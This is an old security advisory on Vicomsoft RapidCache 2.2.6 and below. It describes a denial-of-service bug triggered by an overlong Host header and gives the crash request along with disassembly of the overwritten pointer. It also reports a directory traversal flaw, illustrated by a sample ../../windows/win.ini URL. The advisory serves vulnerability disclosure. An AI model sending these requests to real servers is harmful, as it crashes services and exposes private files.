RapidCache Multiple Vulnerabilities

###################################

Credit:
Author     : Peter Winter-Smith

Software:
Packages   : RapidCache
Versions   : 2.2.6 and below
Vendor     : Vicomsoft
Vendor Url : http://www.vicomsoft.com/rapidcache/rapidcache.main.html

Vulnerability:
Bug Type   : Denial of Service; Directory Traversal
Severity   : Moderately Critical

1. Description of Software

    "RapidCache is a high performance web caching server that adds all
of the advantages of caching to a network already connected to the
Internet.
     RapidCache includes a powerful web caching server with concurrent
caching and page delivery. Web browser-based administration is included,
with a java-based graphical status monitor."
- Vendor's Description

2. Bug Information

(a). Denial of Service Attack

It seems possible to cause a remote RapidCache server to crash by issuing
an overly long 'Host' argument as part of an HTTP GET request. An example
of such a request is shown below (it may appear wrapped, please remove the
excess linefeeds, etc):


---------------------------------------
GET / HTTP/1.1
Accept: */*..Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeBBBBXXX
X:8080
Connection: Keep-Alive


---------------------------------------


   (i) Analysis of the Vulnerable Code

The crash is caused by the overwriting of a saved pointer (which points to
the requested page header, 'GET / HTTP/1.1' in my case) with an arbitrary
value.

The function which overwrites the saved pointer is at 0042D580 in memory,
and is called from 0042BE12:


0042BE12  |. E8 69170000    CALL rapidcac.0042D580
0042BE17  |> 8BCE           MOV ECX,ESI


Inside the function 0042D580, at the address 0042D614, we can see the
dangerous instruction(s):


0042D614  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]


Provided that a long enough 'Host' header has been supplied, the saved
pointer should become completely overwritten!

The dangerous function 0042D580 returns without a problem, and code
execution continues until a call is made to the procedure 0042D620. Inside
this procedure, at 0042D636, the value 2374h is added the ebp register,
causing it to point to the overwritten saved pointer. Then at 0042D63E the
overwritten pointer is moved into the eax register, which is used in a
call to msvcrt.strcspn() (made from 0042D64C) as the 's1' argument.


0042D636  |. 81C5 74230000  ADD EBP,2374
0042D63C  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]
0042D63E  |. 8B45 00        MOV EAX,DWORD PTR SS:[EBP]
0042D641  |. 68 74144500    PUSH rapidcac.00451474 ; s2
0042D646  |. F7D1           NOT ECX
0042D648  |. 49             DEC ECX
0042D649  |. 50             PUSH EAX               ; s1
0042D64A  |. 8BF1           MOV ESI,ECX
0042D64C  |. FF15 5CB84300  CALL DWORD PTR DS:[<&MSVCRT.strcspn>]
0042D652  |. 8B5D 00        MOV EBX,DWORD PTR SS:[EBP]


Inside strcspn(), at offset 77C437F1, the value located at ebp+08h, a copy
of the overwritten pointer, (our 's1' argument to strcspn()), is loaded
into the esi register.


77C437F1   8B75 08          MOV ESI,DWORD PTR SS:[EBP+8]


Moments later into the strcspn(), at the address 77C437F9, the function
attempts to read data from the overwritten pointer into the al register.


77C437F9   8A06             MOV AL,BYTE PTR DS:[ESI]


If it is unable to open the address in the esi register, the application
will cause an access violation and crash, denying any further service to
users.


(b). Directory Traversal Bug

It appears that the Denial of Service bug is not the only flaw present
in the RapidCache application. It is also very easy to view or download
almost any file on the remote system simply by issuing a request similar
to the following:

http://127.0.0.1:8080/../../../../../../../../windows/win.ini

This can allow the exposure of sensitive information, password files and
so forth.


3. Proof of Concept Code

Nope.


4. Patches - Workarounds

No fixes are available as of 15/01/04.


5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.

o This document should be mirrored at:
    - http://www.elitehaven.net/rapidcache.txt

_________________________________________________________________
Express yourself with cool emoticons - download MSN Messenger today! 
http://www.msn.co.uk/messenger